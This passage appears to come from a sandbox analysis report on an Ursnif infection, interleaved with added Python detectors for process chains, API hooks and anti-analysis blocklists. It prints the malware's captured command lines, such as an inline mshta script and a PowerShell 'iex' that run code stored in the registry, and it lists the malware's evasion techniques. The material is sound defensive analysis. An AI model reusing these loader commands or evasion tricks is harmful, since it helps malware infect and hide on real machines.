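    return path.rsplit("\\", 1)[-1].lower()


IEX_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
REG_READ_RE = re.compile(r"\b(gp|get-itemproperty|regread)\b", re.I)
# One or more backslashes, so the HTA's escaped JavaScript string matches too.
APPDATALOW_RE = re.compile(r"software\\+appdatalow\\+software\\+microsoft", re.I)
RUNDLL_RE = re.compile(
    r'rundll32(?:\.exe)?"?\s+"?(?P<path>[^",]+?)"?\s*,\s*(?P<export>\w+)', re.I)
DLL_EXTS = (".dll", ".cpl", ".ocx", ".ax")


def detect(events):
    """Return (rule, command_line) pairs for every rule an event trips."""
    findings = []
    for ev in events:
        parent, image, cmd = _base(ev.parent_image), _base(ev.image), ev.command_line
        low = cmd.lower()
        if parent == "mshta.exe" and image in ("powershell.exe", "pwsh.exe", "cmd.exe",
                                               "wscript.exe", "cscript.exe"):
            findings.append(("mshta_spawns_shell", cmd))
        if image == "mshta.exe" and "about:" in low and "regread" in low:
            findings.append(("inline_hta_reads_registry", cmd))
        if image in ("powershell.exe", "pwsh.exe") and IEX_RE.search(cmd) and REG_READ_RE.search(cmd):
            findings.append(("powershell_iex_from_registry", cmd))
        if image == "rundll32.exe":
            m = RUNDLL_RE.search(cmd)
            if m and not m.group("path").lower().endswith(DLL_EXTS):
                findings.append(("rundll32_non_dll_module", cmd))
            if parent == "wmiprvse.exe":
                findings.append(("wmi_spawned_process", cmd))
        if image == "csc.exe" and parent in ("powershell.exe", "pwsh.exe") \
                and "\\appdata\\local\\temp\\" in low:
            findings.append(("powershell_compiles_csharp_from_temp", cmd))
        if APPDATALOW_RE.search(cmd):
            findings.append(("appdatalow_registry_path", cmd))
    return findings


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed from the report; parents of root processes are assumed
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
              r"C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\presentation[2021.09.09_15-26].vbs'"),
    ProcEvent(r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\rundll32.exe",
              r"rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\SysWOW64\rundll32.exe",
              r"rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\System32\mshta.exe about:<hta:application><script>Wfdc='wscript.shell';"
              r"resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\Software\\AppDataLow\\Software"
              r"\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\DeviceFile'));if(!window.flag)close()</script>"),
    ProcEvent(r"C:\Windows\System32\mshta.exe", PS,
              PS + r" iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software"
              r"\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))"),
    ProcEvent(PS, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /noconfig /fullpaths "
              r"@C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline"),
    # Benign control: rundll32 loading a real .dll from System32 must not fire.
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for rule, cmd in detect(SAMPLE_EVENTS):
        print(f"{rule:40} {cmd[:70]}")
```

The rundll32 rule keys on the module's extension rather than on the export name because DllRegisterServer is a legitimate entry point; the registry rule pairs iex with a registry read (gp, Get-ItemProperty, regread) so that ordinary iex usage alone does not fire.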
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_6FBB2210 push ecx; ret 21_2_6FBB2219
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_6FBB2263 push ecx; ret 21_2_6FBB2273
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC7AB0 push ecx; ret 21_2_04BC7AB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_04BC7E1F push ecx; ret 21_2_04BC7E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_05E6528F push ecx; ret 21_2_05E6529F
Source: C:\Windows\System32\control.exe Code function: 32_2_00C9C6E9 push 3B000001h; retf 32_2_00C9C6EE
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 21_2_6FBB1A0A LoadLibraryA,GetProcAddress, 21_2_6FBB1A0A
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.cmdline' Jump to behavior

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\fum.cpp Jump to dropped file
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.dll Jump to dropped file
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\fum.cpp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000015.00000003.1100831932.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097126029.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097248260.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097156234.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1178938192.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097185977.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097225716.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097283225.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1222209287.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1179057406.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.1178835600.0000016F94C7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097297117.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1157748443.00000000062E8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1097267626.0000000005888000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1105474660.000000000568C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4504, type: MEMORYSTR
Source: Yara match File source: 21.3.rundll32.exe.5838d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.578a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.58094a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.rundll32.exe.578a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000000.1176959045.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.1173339392.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1103640775.0000000005809000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.1175334626.0000000000C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.1221119443.0000000000C91000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.1192551182.000000000550F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.1103580587.000000000578A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.1238922914.000001B6E2E3E000.00000004.00000001.sdmp, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\presentation[2021.09.09_15-26].vbs Jump to behavior
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200
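The three hook findings above (EAT, inline prolog, IAT) are the kind of check an analyst repeats on a live host or a memory image. The block below is an added example, not Joe Sandbox code: it classifies a function prolog as a known trampoline stub, checks export pointers against base + RVA, and checks IAT slots against the range of the DLL that should export them. Module bases, sizes, RVAs and the clean prolog bytes are made up; the two addresses 0x7FFABB03521C and 0x7FFABB035200 are the ones this report lists, reused as the constructed hook targets. A live check would read live_prolog from the process and clean_prolog from the on-disk image, and must resolve api-ms-* forwarder names to their host DLL before calling audit_iat.

```python
"""Offline user-mode hook checks (inline prolog, EAT, IAT). Added example,
not Joe Sandbox code; all module data below is constructed."""
import struct
from dataclasses import dataclass


@dataclass
class Export:
    name: str
    rva: int              # offset of the function inside the module
    eat_pointer: int      # VA currently stored in the export table
    clean_prolog: bytes   # first bytes of the function in the on-disk image
    live_prolog: bytes    # first bytes of the function as mapped in the process


@dataclass
class Module:
    name: str
    base: int
    size: int
    exports: list


def in_module(ptr: int, mod: Module) -> bool:
    return mod.base <= ptr < mod.base + mod.size


def classify_prolog(code: bytes, va: int):
    """Return (trampoline_kind, target) if code starts with a known hook stub,
    else None. va is the virtual address of code[0]."""
    if len(code) >= 5 and code[0] == 0xE9:                        # jmp rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return ("jmp_rel32", va + 5 + rel)
    if len(code) >= 6 and code[:2] == b"\xFF\x25":                # jmp [rip+disp32]
        slot = va + 6 + struct.unpack_from("<i", code, 2)[0]
        if slot == va + 6 and len(code) >= 14:                    # disp 0: pointer follows the jmp
            return ("jmp_rip_indirect", struct.unpack_from("<Q", code, 6)[0])
        return ("jmp_rip_indirect_slot", slot)
    if len(code) >= 6 and code[0] == 0x68 and code[5] == 0xC3:    # push imm32; ret
        return ("push_ret", struct.unpack_from("<I", code, 1)[0])
    if len(code) >= 12 and code[:2] == b"\x48\xB8" and code[10:12] == b"\xFF\xE0":  # mov rax, imm64; jmp rax
        return ("mov_rax_jmp", struct.unpack_from("<Q", code, 2)[0])
    return None


def audit_exports(mod: Module):
    """EAT and inline-hook checks for every export of mod."""
    findings = []
    for ex in mod.exports:
        expected = mod.base + ex.rva
        if ex.eat_pointer != expected:
            where = "inside" if in_module(ex.eat_pointer, mod) else "outside"
            findings.append(("eat_hook", ex.name,
                             f"export redirected {where} module to {ex.eat_pointer:#x}"))
        if ex.live_prolog[:len(ex.clean_prolog)] != ex.clean_prolog:
            stub = classify_prolog(ex.live_prolog, expected)
            detail = f"{stub[0]} -> {stub[1]:#x}" if stub else "unknown_patch"
            findings.append(("inline_hook", ex.name, detail))
    return findings


def audit_iat(importer: str, slots, modules):
    """slots: (exporting_dll, function, pointer) triples from importer's IAT.
    Flags any slot whose pointer is not inside the DLL that should export it."""
    by_name = {m.name.lower(): m for m in modules}
    findings = []
    for dll, func, ptr in slots:
        mod = by_name.get(dll.lower())
        if mod is None or not in_module(ptr, mod):
            findings.append(("iat_hook", f"{importer}!{dll}:{func}",
                             f"slot {ptr:#x} not inside {dll}"))
    return findings


CLEAN = bytes.fromhex("4C8BDC53565741")           # hypothetical clean prolog bytes
HOOK_EAT = 0x7FFABB03521C                           # address from the report
HOOK_IAT = 0x7FFABB035200                           # address from the report
KERNEL32 = Module("KERNEL32.DLL", 0x7FFAC1000000, 0xC0000, [   # base/size constructed
    Export("CreateProcessAsUserW", 0x1B2A0, HOOK_EAT, CLEAN,
           b"\xFF\x25\x00\x00\x00\x00" + struct.pack("<Q", HOOK_EAT)),  # jmp [rip+0]; dq target
    Export("CreateProcessW", 0x1B100, 0x7FFAC101B100, CLEAN, CLEAN),   # untouched control
])
USER32_IAT = [("KERNEL32.DLL", "CreateProcessW", HOOK_IAT),            # hooked slot
              ("KERNEL32.DLL", "CloseHandle", 0x7FFAC1010000)]          # benign slot

if __name__ == "__main__":
    for f in audit_exports(KERNEL32) + audit_iat("user32.dll", USER32_IAT, [KERNEL32]):
        print(*f)
```

An unrecognised prolog patch is still reported as unknown_patch: the byte comparison against the on-disk image is the primary signal, and the stub classifier only adds the jump target when the pattern is one it knows.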
Stores large binary data to the registry
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Key value created or modified: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550 UtilDate Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (86 identical entries)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (26 identical entries)

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.1015558083.000001BA1E067000.00000004.00000001.sdmp Binary or memory string: D"WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.1014215858.000001BA2228D000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
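The strings above are a process-name blocklist the script compares against running processes: debuggers, Sysinternals tools, sniffers, Sandboxie components, Frida helpers and default sample names (SAMPLE.EXE, SAMP1E.EXE, XXX.EXE). Several names carry trailing junk bytes in memory (REGMON.EXEIK, SCKTOOL.EXE;HQ, PEID.EXE#Z), so a scanner has to match the name without relying on a clean terminator. The following Python is an added example, not part of the sandbox report and not the sample's own code: it pulls *.EXE tokens out of a memory region, scores them against the tool names listed in the report, and tells an analyst which processes on a detonation VM would trip the check. The memory blob, the process list, the function names and the min_hits threshold are constructed for the example.

```python
"""Extract an anti-analysis process blocklist from a memory dump and check which
running processes would trip it. Added example; all inputs are constructed."""
from __future__ import annotations
import re
from typing import Iterable

# Analysis-tool names as listed in the report's wscript.exe memory strings. The
# junk bytes that follow some names in memory ("IK", ";HQ", "#Z") are not part
# of the names and are left out. This is the reference set for scoring.
KNOWN_ANALYSIS_TOOLS = frozenset("""
AUTORUNSC.EXE EMUL.EXE SBIECTRL.EXE APISPY.EXE FAKEHTTPSERVER.EXE REGMON.EXE
WINDBG.EXE SBIESVC.EXE SCKTOOL.EXE IDAQ.EXE IMPORTREC.EXE IMUL.EXE WINDUMP.EXE
SANDBOXIERPCSS.EXE FRIDA-WINJECTOR-HELPER-32.EXE PEID.EXE SYSANALYZER.EXE
PETOOLS.EXE PROCMON.EXE OLLYDBG.EXE HOOKEXPLORER.EXE NETSNIFFER.EXE AUTORUNS.EXE
HOOKANAAPP.EXE FRIDA-WINJECTOR-HELPER-64.EXE TCPDUMP.EXE FILEMON.EXE
SANDBOXIEDCOMLAUNCH.EXE BEHAVIORDUMPER.EXE IDAG.EXE REGSHOT.EXE DUMPCAP.EXE
WIRESHARK.EXE FORTITRACER.EXE WINAPIOVERRIDE32.EXE ETHEREAL.EXE MBARUN.EXE
REPUX.EXE ETTERCAP.EXE MDPMON.EXE RUNSAMPLE.EXE MMR.EXE SAMP1E.EXE WINSPY.EXE
FAKESERVER.EXE SAMPLE.EXE FIDDLER.EXE MULTIPOT.EXE SANDBOXIECRYPTO.EXE XXX.EXE
""".split())

# Candidate names: letters/digits/_/- followed by ".EXE". Deliberately no trailing
# word boundary: in the dump the names run straight into junk bytes
# ("REGMON.EXEIK", "SANDBOXIERPCSS.EXEV5").
EXE_RE = re.compile(rb"[A-Z0-9_\-]{2,40}\.EXE", re.IGNORECASE)


def extract_exe_names(blob: bytes) -> set[str]:
    """Every *.EXE token in the blob, upper-cased. Legitimate names are included."""
    return {m.group(0).decode("ascii", "replace").upper() for m in EXE_RE.finditer(blob)}


def detect_tool_blocklist(blob: bytes, known=KNOWN_ANALYSIS_TOOLS, min_hits: int = 5) -> dict:
    """Flag the blob as carrying an analysis-tool blocklist when at least min_hits
    of its *.EXE tokens are known tools; a lone PROCMON.EXE in an unrelated
    string is not enough. min_hits is an assumed threshold."""
    names = extract_exe_names(blob)
    hits = names & known
    return {"names": names, "hits": hits, "flagged": len(hits) >= min_hits}


def would_trip(running: Iterable[str], blocklist: set[str]) -> set[str]:
    """Running process names (full paths allowed) that are on the blocklist, i.e.
    the tools to rename or stop before detonating the sample."""
    return {n.replace("/", "\\").rsplit("\\", 1)[-1].upper() for n in running} & blocklist


# Constructed stand-in for a wscript.exe memory region: strings from the report,
# with the junk bytes that follow some names, plus one ordinary process path.
SAMPLE_DUMP = (
    b"\x00\x00AUTORUNSC.EXE\x00EMUL.EXE\x00SBIECTRL.EXE\x00REGMON.EXEIK\x00"
    b"Q?$SANDBOXIERPCSS.EXEV5\x00:FRIDA-WINJECTOR-HELPER-32.EXE\x00PEID.EXE#Z\x00"
    b"IMUL.EXE.8\x00WIRESHARK.EXE\x00U.SANDBOXIEDCOMLAUNCH.EXE\x00"
    b'D"WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","WINDBG.EXE","PROCMON.EXE")'
    b"\x00C:\\Windows\\System32\\wscript.exe\x00"
)

if __name__ == "__main__":
    verdict = detect_tool_blocklist(SAMPLE_DUMP)
    print("flagged:", verdict["flagged"], "hits:", sorted(verdict["hits"]))
    # Constructed process list for an analysis VM.
    vm_processes = ["explorer.exe", "ProcMon.exe", r"C:\Tools\wireshark.exe", "svchost.exe"]
    print("would trip:", sorted(would_trip(vm_processes, verdict["hits"])))
```

Running it over a real dump (for example the minidump of wscript.exe) gives the set to check a VM image against; the SAMPLE.EXE / SAMP1E.EXE / XXX.EXE entries mean renaming the sample to a generic name is itself a tell.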
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 2944 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6400 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6400 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Found evasive API chain (date check)
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Note: 922337203685477 is Int64.MaxValue divided by 10000, i.e. the largest value a 100 ns relative timeout yields when converted to milliseconds; these entries therefore record an effectively indefinite wait rather than a timed sleep.
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3833 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4955 Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.dll Jump to dropped file
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
